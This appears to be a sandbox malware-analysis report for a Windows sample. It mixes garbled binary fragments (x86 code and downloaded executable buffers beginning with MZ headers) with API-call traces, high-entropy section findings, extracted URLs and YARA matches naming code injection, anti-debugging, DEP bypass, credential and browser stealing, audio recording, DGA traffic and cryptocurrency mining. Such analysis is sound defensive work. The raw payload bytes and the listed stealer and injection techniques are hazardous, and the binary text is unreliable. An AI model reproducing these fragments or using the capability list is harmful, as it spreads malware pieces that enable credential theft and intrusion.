ÿÿÿ@ƒÁƒêu^ÂÌÌÌÌÌÌÌÌ̃ì€|$‰L$…ÀSUVW"2Ò3ÿÆD$ 3í‰D$ëI¸;ø+¶t$ ‹ÿ¶œ¶ÒÞӁâÿ€yJÊÿÿÿBH;Ç}ÜGç€ÆD$yOƒÏàG…í|2f¶Ú"uf;u	‹L$ÆD$ƒîuè€|$uþD$ 냋D$f¶òf‰0Eý‰D$Œbÿÿÿ_^][ƒÄÂÌÌÌÌÌÌÌ̃ìSUV¾W3Û3ÿ‰t$Cãÿ€yKËÿÿÿC‰\$¶™ t>%F‹ÆG%€yHƒÈà@¶„ÃǙ½ÿ÷ý¸Bf9„Q"ű\$3À”Q"4æÿ€yNÎÿÿÿFÁæ	f‹´"f‰2@Â=|ыt$Fþ‰t$Œ[ÿÿÿ_^][ƒÄÂÌÌÌÌÌÌÌÌÌÌÌÌÌSU¸·ÐV‹ñW‹ÂÁ⍮"¹€‹ýó«‹|$W‹Îè þÿÿW‹Îèøþÿÿ3ۋþ‹Õ‹ÿ3ÀŠ
ˆ¶ÉÁÁáÈ@ƒÂ=ˆ1|ßCÇû|Î_^][ÂÌÌÌÌÌÌ̃ì8S°6ˆD$+ˆD$/°8ˆD$0ˆD$1ˆD$3UV‹ñ¸þÿ+ƉD$¸
þÿ+ƉD$¸þÿ+ƉD$³2¸þÿ+ƈ\$2ˆ\$A‰D$(W±®»þÿ¸þÿ+Þ+Æ¿þÿ²E+þˆL$8ˆL$BˆL$GÆD$4xÆD$5aˆT$:ÆD$>fÆD$A3ÆD$CÆD$DtˆT$FÆD$@‹ÆD$9bÇD$Ž‰\$‰D$(‰|$0ë‹\$ù‹Ç™½÷ýƒÈ»¶l4™÷û¶D4¯Å‹×âÿÁâÕ¶2Ç3Â%ÿ€yH
ÿÿÿ@ˆ‹D$™÷û‹D$ÁƒÈ½¶\4™÷ý¶T4¯ÓD:‹T$âÿÁâÓ¶23Â%ÿ€yH
ÿÿÿ@ˆA‹D$‹Ã™÷ý‹D$ ÁƒÈãÿÁã¶T4‰T$$™÷ý‹D$$ضT4¯Ð¶3T:3Ёâÿ€yJÊÿÿÿBˆQ‹T$(
‹Ã™÷ýãÿÁã¶D4‹T$,‰D$$
ƒÈ™÷ý‹D$$ضT4¯Ð¶3T:3Ёâÿ€yJÊÿÿÿB‹|$0ƒD$ˆQƒÁƒú Œžþÿÿ†P‹Îèûÿÿj‹Îˆ† è9ýÿÿ_^]°[ƒÄ8ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹l$ƒýW‹ùŒÚ‹D$V‹t$UPVè^šƒÄƒýu ¶¶— ÁÁáϊ
ˆ^_]ÂMÿ3À…É~-Së
¤$I¶0¶\0ÂÁâ׊ˆ0@;Á|á[¶‡ ¶T.ÿƒðUÂÇÁ⊈D.ÿ‹Áƒø|(덛¶0¶L0ÿÂÁâϊ
ˆ0Hƒø}බ‡ ÂÁâ׊ˆ^_]Âƒì$V‹D$,¶¶P€ñ£€òTˆL$¶HˆT$¶PöрòuˆL$¶HˆT$¶P€ñç€òDˆL$¶HˆT$	¶P€ñK€ò#ˆL$
¶HˆT$¶P	€ñ¿€òEˆL$¶H
ˆT$
¶P€ñ;€òVˆL$¶HˆT$¶P
€ñø€ò˜ˆL$¶HˆT$¶P€ñ[€òôˆL$¶HˆT$¶P€ñµ€ò‡ˆL$¶HˆT$¶P€ñ{€òˆL$¶HˆT$¶P€ñô€òvˆL$¶HˆT$¶P€ñ¹€ò4ˆL$¶HˆT$¶P€ñ¿€òˆL$¶HˆT$¶P‹t$0€ñç€òxˆL$¶HˆT$¶P€ñ˜€òéˆL$ ¶HˆT$!¶Pj D$P€ño€ò´VˆL$.ˆT$/ÆD$0脛ƒÄ‹Æ^ƒÄ$ÃÌÌÌÌÌÌÌÌÌÌV‹t$…öu
hWۏ
øÿÿ‹L$…É}
hW€èû÷ÿÿW‹|$…ÿu
hW€èè÷ÿÿ‹;Çt:;L$~jQPèVŸƒÄ…Àu5h€èÂ÷ÿÿPèqžƒÄ‰>ƒ>uh€è¨÷ÿÿ;L$~éjQèݞƒÄ‰ëÜ_^ÃSVWj‹ÙèꖋðƒÄ…öt-‹|$WÇFÇFÿt±A‰…Àu…ÿth€èޔ3ö‰3…öu
h€è̔_^‹Ã[ÂÌÌÌÌV‹ñ‹…Àt‹‹QPÿҋÆÇ^ÃÌÌÌÌÌSU‹l$‹Ù…íu‰+][ÂVWUÿ°A‹øh€CPGWSèÁþÿÿ‹‹L$(ƒÄWPWUjQÿ°A‹ð÷ÞöƒÆtVÿ°AƒøzuB‹T$jjWUjRÿ°A‹ðh€CPVSèpþÿÿ‹‹L$(ƒÄVPWUjQÿ°A‹ð÷ÞöF…ötèšöÿÿ_^][ÂÌÌÌVW‹ù‹7…öt>FPÿ°A…Àu*…öt&‹…ÀtPÿp±A‹F…Àt	Pèõ•ƒÄVèᔃÄÇ_^ÃÌÌÌÌ́ìŒSUVW3ÛSÿ|±A„$PL$QÆD$àÆD$;ÆD$ÆD$*ÆD$¢ÆD$*ÆD$*ÆD$AÆD$ ÓÆD$! ÆD$"dÆD$#ÆD$$ŠÆD$%÷ÆD$&=ÆD$'ÆD$(ÙÆD$)îÆD$*ÆD$+hÆD$,ôÆD$-vÆD$.¹ÆD$/4ÆD$0¿ÆD$1ÆD$2çÆD$3xÆD$4˜ÆD$5éÆD$6oÆD$7´ˆ\$8è—ûÿÿPèߞƒÄ= ²A„½	ÿD°APj譒”$x‹øRWDŽ$€$ÆD$dÎÆD$e'ÆD$fœÆD$gÆD$h•ÆD$i.ÆD$j"ÆD$kWÆD$l‘ÆD$m!ÆD$nWÆD$o:ÆD$pøÆD$q˜ÆD$r[ÆD$sôÆD$tµÆD$u‡ÆD$v{ÆD$wÆD$xôÆD$yvÆD$z¹ÆD${4ÆD$|¿ÆD$}ÆD$~çÆD$xƄ$€˜Æ„$éƄ$‚oƄ$ƒ´ˆœ$„ÆD$ÀÆD$8ÆD$ÆD$ÆD$ŽÆD$0ÆD$eÆD$GÆD$ ÓÆD$!)ÆD$";ÆD$#VÆD$$øÆD$%˜ÆD$&[ÆD$'ôÆD$(µÆD$)‡ÆD
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PEL^±eà3 @@ €`…Ä2L@n` 3 H.text(  `.rsrcn@@@.reloc`@BHÀÈjè­Ø	0Ï(

rp8ž(
(
o
o
(
(
9s
8(
	(+(+
Ý&Ý	,ß	(

84o
(+8o

(+o
&(
-â(
-ÂX ˆ?WÿÿÿÝ
9o
Ü*BY»Á
(
*(
*º~:rapÐ(
o
s
€~*~*€*j(r™p~o
t*{
*{
*V(
}
}
*0Ju
;:92(
{
{
o
9(
{
{
o
***Ò 8ÐÁz )UU¥Z(
{
o
X )UU¥Z(
{
o
X*0nr©p%{

%qŒ:&8þo
¢%{
%qŒ:&8þo
¢( 
*2(!
o"
*Ž:ríps#
z(!
o$
o"
*:(Í(%
*:(Ì(%
*N{&
o+(%
*z{(
{&
{)
s*
(+
*2(!
o,
*Ž:ríps#
z(!
o$
o,
*:(Í(-
*:(Ì(-
*N{&
o+(-
*~{(
{&
{)
s*
(+
j*Ž:ríps#
z(!
o$
o.
*:(Í(/
*:(Ì(/
*N{&
o+(/
*z{(
{&
{)
s*
(0
*0
I(À(1
9rps#
z(!
o2
o3
o4
(+%o(+o;*Frp(Á(5
*0B:rps#
z{&
o+
(5
{&
Ð(
o…¥*0
H(À(1
9rps#
z(!
o6
o3
o4
(+%o(+o;*Frp(Á(7
*0B:rps#
z{&
o+
(7
{&
Ð(
o…¥*0A(y:oK9r!ps#
z{(
{)
;%¢o0þ*N{(
{)
o1*’:ríps#
z{(
{)
o1*:(Í(8
*:(Ì(8
*N{&
o+(8
*¢{(
{&
{)
sïs*
{9
(:
*0
::ríps#
z(!
{9
o;
o$
o<
o=
o>
*0N:r'ps#
z9oã ÿÿÿ;oå{(
{&
{)
s*
(?
*V{&
o+(@
*0H(y:oK9r!ps#
zr3p;%¢(Ì ÿÿÿ(@
(	+*N ÿÿÿ(@
(	+*:(Í(B
*N(À(Ì(B
*N{&
o+(B
*N ÿÿÿ(C
(	+*^(!
{9
o;
o>
*0&:rps#
z{&
o+
(D
*0V(À(1
9rps#
z{)
{E
{(
{&
sF
%{9
{9
oG
%{9
oH
*ò(1
9rEps#
z:rOps#
z{(
{)
o4*03:rOps#
zo¦repryp	(I

(J
*0(
+
(L
*0	(
+
(J
*0
r
{&
o+
Ð(
(l9Oo¸9Do¨
@o¦r{p(N
(Á
8rƒpo¦rp(O
s}z*N{(
{)
o5*0}Œ	:réps#
z{&
o+
(Q
{(
{)
9%¢{E
o,&rpo;9{R
oŒ	o-o*0tŒ	:réps#
z(y:oK9r!ps#
z{&
o+
rpo<{(
{)
9%¢{E
o,&*Â:r÷ps#
z{(
{)
(S
{E
o,*Â:r÷ps#
z{(
{)
(S
{E
o,*ZþsT
%}U
%}V
*0Ö
{R
9Érpo"9·{E
@oN9oD9‡{E

@+oK:ooV9oI(¾(Ñ:O{E
@ oW9oJ~W
(X
:"{E
@$oO9oE:rpo &**0	BŒ	:réps#
z{&
o+
{(
{)
9%¢o-þ*0pŒ	:réps#
z(y:oK9r!ps#
z{&
o+
rpo<{(
{)
9%¢o-þ*Ö:r÷ps#
z{(
{)
þY
sZ
(
+o-
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
InternetReadFile

  
  
    
      
    
  


  
    
      buffer:
      
        
          MZÿÿ¸@€º´	Í!¸LÍ!This program cannot be run in DOS mode.

$PELºú°¿à0âÌŽ  @  @…@K ÀÉ  H.text”à â `.rsrcÀÉ Êä@@.reloc®@BpHd:0vz”°¸*(*0
As

~%:&~þs
%€(+o
8Îo
%rprYp~
(
¢%rqpr¯p~
(
¢%rÇprp~
(
¢%r!prap~
(
¢(Å
	o
8,(	
ssŸ~
}~
s

(
o
}{rqprÑp~
(
o

		9rãprp~
(
8Arprap~
(
o

:{(È8{(Ç(
þ

9 o
(
o
o
(
{(Æ(
þ

9×s
s
s
þs
~%:&~þs
%€(+þ
s
~%:&~þs
%€(+þs
~%:&~þs
%€(+o
þ9b{%rip¢o
šr}p(
(p(+o
s
(~(+oˆo
#>@(
(
io
&Ý	Ý( 
þ9­þs
~%:&~þs
%€(+þs
~%:&~þs
%€(+þs
~	%:&~þs
%€	(+(!
&Ý	Ýo“o•þs"
~
%:&~þs#
%€
(+o—oþs$
~%:&~þs%
%€(+o™þs&
~%:&~þ s'
%€(+o›(+9[sŸ%o“%r£p(
o•%s)
o—%o%s*
o™%s+
o›o,
(+9[sŸ%o“%rµp(
o•%s)
o—%o%s*
o™%s+
o›o,
Ý	Ýožþ9o,
(-
:ÈúÿÿÝþo.
Üo/
:'úÿÿÝ9o.
ÜÝ&Ý8*A”	/8	³T	èÙÁ	¸Bú7ã'.0Âs)


%Ðá(0
s1
(2
(3
þ
	9	݀(	s6%Ы(0
s1
o9&8s¿o;o4
oºo;o4
o¼o;(o¾Ý	Ý݁o¹( 
:o¹8rËpoºo»( 
:o»8rËpo¼o½( 
:o½8rËpo¾Üo½rËp(5
		9o6
Xo5þ

:ÜþÿÿÝ	ÝÝ	Ý8*Ad}MÊ	}[؁FYŸ	§®	0ës

(2
(3
þ
	9	Ý¿(	s6%ÐÏ(0
s1
o9&8Ps %o;o4
o£%o;o4
o
.þo¥%o;o4
o§%o;o
1þo©%o;o4
(7
 @Bj[!‘¶Yo«%o;o4
o­%o;(o¯oªjþ9-(8
		(9
		(:
!€µ÷õŸYo«Ý&Ý:8(®( 
þ

9	o;
Xo5þ:œþÿÿÝ&ÝÝ	Ý8*ALcr0™ÉÐ×	0£s*

%ÐÕ(0
s1
(2
(3
þ
	9	Ýb(	s6%Е(0
s1
o9&8ò%ж(0
s1
o7o4
%а(0
s1
o<
:"%Ðç(0
s1
o<
8		9(s‘

%Ðí(0
s1
o7o4
oŽ
o
Ý&Ýþ9	o=
Xo5þ:úþÿÿÝ	
ÝÝ	Ý8*ALxÈ@E;€	ˆ	0Xs+

%ÐÕ(0
s1
(2
(3
þ
	9Ý(	
        
      
      
      

    
  
    
      request_handle:
      
        
          0x00cc000c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                    
                                        
                                            section
                                            {u'size_of_data': u'0x00072a00', u'virtual_address': u'0x00001000', u'entropy': 7.999628348377575, u'name': u'', u'virtual_size': u'0x0010a000'}
                                        
                                    
                                        
                                            entropy
                                            7.99962834838
                                        
                                    
                                        
                                            description
                                            A section with a high entropy has been found
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            section
                                            {u'size_of_data': u'0x00011e00', u'virtual_address': u'0x0010b000', u'entropy': 7.9949794414039665, u'name': u'', u'virtual_size': u'0x00027000'}
                                        
                                    
                                        
                                            entropy
                                            7.9949794414
                                        
                                    
                                        
                                            description
                                            A section with a high entropy has been found
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            section
                                            {u'size_of_data': u'0x00000800', u'virtual_address': u'0x00132000', u'entropy': 7.31278394634321, u'name': u'', u'virtual_size': u'0x00004000'}
                                        
                                    
                                        
                                            entropy
                                            7.31278394634
                                        
                                    
                                        
                                            description
                                            A section with a high entropy has been found
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            section
                                            {u'size_of_data': u'0x0009d600', u'virtual_address': u'0x00445000', u'entropy': 7.939255201582201, u'name': u'.data', u'virtual_size': u'0x0009e000'}
                                        
                                    
                                        
                                            entropy
                                            7.93925520158
                                        
                                    
                                        
                                            description
                                            A section with a high entropy has been found
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            entropy
                                            0.986411889597
                                        
                                    
                                        
                                            description
                                            Overall entropy of this PE file is high
                                        
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
LookupPrivilegeValueW

  
  
    
      
    
  


  
    
      system_name:
      
        
          
        
      
      
      

    
  
    
      privilege_name:
      
        
          SeDebugPrivilege
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
LookupPrivilegeValueW

  
  
    
      
    
  


  
    
      system_name:
      
        
          
        
      
      
      

    
  
    
      privilege_name:
      
        
          SeDebugPrivilege
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
LookupPrivilegeValueW

  
  
    
      
    
  


  
    
      system_name:
      
        
          
        
      
      
      

    
  
    
      privilege_name:
      
        
          SeDebugPrivilege
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
LookupPrivilegeValueW

  
  
    
      
    
  


  
    
      system_name:
      
        
          
        
      
      
      

    
  
    
      privilege_name:
      
        
          SeDebugPrivilege
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    url
                                    https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://crash-reports.mozilla.com/submit?id=
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://crashpad.chromium.org/bug/new
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://crashpad.chromium.org/
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://clients4.google.com/invalidation/android/request/
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://services.ukrposhta.com/postindex_new/
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://dts.search-results.com/sr?lng=
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://inposdom.gob.do/codigo-postal/
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://creativecommons.org/ns
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://www.postur.fo/
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://qc.search.yahoo.com/search?ei=
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://cacert.omniroot.com/baltimoreroot.crt09
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://codereview.chromium.org/25305002).
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://search.yahoo.com/search?ei=
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://t1.symcb.com/ThawtePCA.crl0/
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://crbug.com/31395.
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://support.google.com/chrome/answer/165139
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://crbug.com/320723
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://datasaver.googleapis.com/v1/clientConfigs
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://crl.starfieldtech.com/sfroot-g2.crl0L
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://ct.startssl.com/
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://suggest.yandex.com.tr/suggest-ff.cgi?part=
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://de.search.yahoo.com/favicon.ico
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://github.com/GoogleChrome/Lighthouse/issues
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://www.searchnu.com/favicon.ico
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://support.google.com/installer/?product=
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://msdn.microsoft.com/en-us/library/ms792901.aspx
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://www.najdi.si/search.jsp?q=
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://x.ss2.us/x.cer0
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://crl.geotrust.com/crls/gtglobal.crl04
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://accounts.google.com/ServiceLogin
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://accounts.google.com/OAuthLogin
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://c.android.clients.google.com/
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://www.google.com/tools/feedback/chrome/__submit
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://chrome.google.com/webstore/category/collection/dark_themes
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://check.googlezip.net/generate_204
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://ocsp.starfieldtech.com/08
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://www.guernseypost.com/postcode_finder/
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://crl.certum.pl/ca.crl0h
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://ator
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://suggest.yandex.by/suggest-ff.cgi?part=
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://feed.snap.do/?q=
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://www.language
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://support.google.com/chrome/
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://developer.chrome.com/apps/declare_permissions.html
                                    
                                


                            

                        

                            

                                

                                    url
                                    http://www.google.com/chrome/intl/ko/eula_text.html
                                    
                                


                            

                        

                            

                                

                                    url
                                    https://www.globalsign.com/repository/03
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Code injection with CreateRemoteThread in a remote process
                                        
                                    
                                        
                                            rule
                                            Code_injection
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__GlobalFlags
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__QueryInfo
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Thread
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Active
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            ThreadControl__Context
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            SEH__vectored
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Checks if being debugged
                                        
                                    
                                        
                                            rule
                                            anti_dbg
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Bypass DEP
                                        
                                    
                                        
                                            rule
                                            disable_dep
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__GlobalFlags
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__QueryInfo
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Thread
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Active
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            ThreadControl__Context
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            SEH__vectored
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Checks if being debugged
                                        
                                    
                                        
                                            rule
                                            anti_dbg
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Bypass DEP
                                        
                                    
                                        
                                            rule
                                            disable_dep
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Match Windows Http API call
                                        
                                    
                                        
                                            rule
                                            Str_Win32_Http_API
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            PWS Memory
                                        
                                    
                                        
                                            rule
                                            Generic_PWS_Memory_Zero
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Code injection with CreateRemoteThread in a remote process
                                        
                                    
                                        
                                            rule
                                            Code_injection
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__GlobalFlags
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__QueryInfo
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Thread
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Active
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerException__SetConsoleCtrl
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            ThreadControl__Context
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            SEH__vectored
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Checks if being debugged
                                        
                                    
                                        
                                            rule
                                            anti_dbg
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Anti-Sandbox checks for ThreatExpert
                                        
                                    
                                        
                                            rule
                                            antisb_threatExpert
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Bypass DEP
                                        
                                    
                                        
                                            rule
                                            disable_dep
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Create a windows service
                                        
                                    
                                        
                                            rule
                                            Create_Service
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Client_SW_User_Data_Stealer
                                        
                                    
                                        
                                            rule
                                            Client_SW_User_Data_Stealer
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Communications over RAW Socket
                                        
                                    
                                        
                                            rule
                                            Network_TCP_Socket
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Communication using DGA
                                        
                                    
                                        
                                            rule
                                            Network_DGA
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Match Windows Http API call
                                        
                                    
                                        
                                            rule
                                            Str_Win32_Http_API
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            browser info stealer
                                        
                                    
                                        
                                            rule
                                            infoStealer_browser_Zero
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Take ScreenShot
                                        
                                    
                                        
                                            rule
                                            ScreenShot
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Escalate priviledges
                                        
                                    
                                        
                                            rule
                                            Escalate_priviledges
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Google Chrome User Data Check
                                        
                                    
                                        
                                            rule
                                            Chrome_User_Data_Check_Zero
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Steal credential
                                        
                                    
                                        
                                            rule
                                            local_credential_Steal
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            PWS Memory
                                        
                                    
                                        
                                            rule
                                            Generic_PWS_Memory_Zero
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Record Audio
                                        
                                    
                                        
                                            rule
                                            Sniff_Audio
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Communications over HTTP
                                        
                                    
                                        
                                            rule
                                            Network_HTTP
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Communications use DNS
                                        
                                    
                                        
                                            rule
                                            Network_DNS
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Code injection with CreateRemoteThread in a remote process
                                        
                                    
                                        
                                            rule
                                            Code_injection
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            Perform crypto currency mining
                                        
                                    
                                        
                                            rule
                                            BitCoin
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__GlobalFlags
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__QueryInfo
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerCheck__RemoteAPI
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            description
                                            (no description)
                                        
                                    
                                        
                                            rule
                                            DebuggerHiding__Thread
                                        
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
RegOpenKeyExA

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        
      
      
      

    
  
    
      base_handle:
      
        
          0x80000002
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000478
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

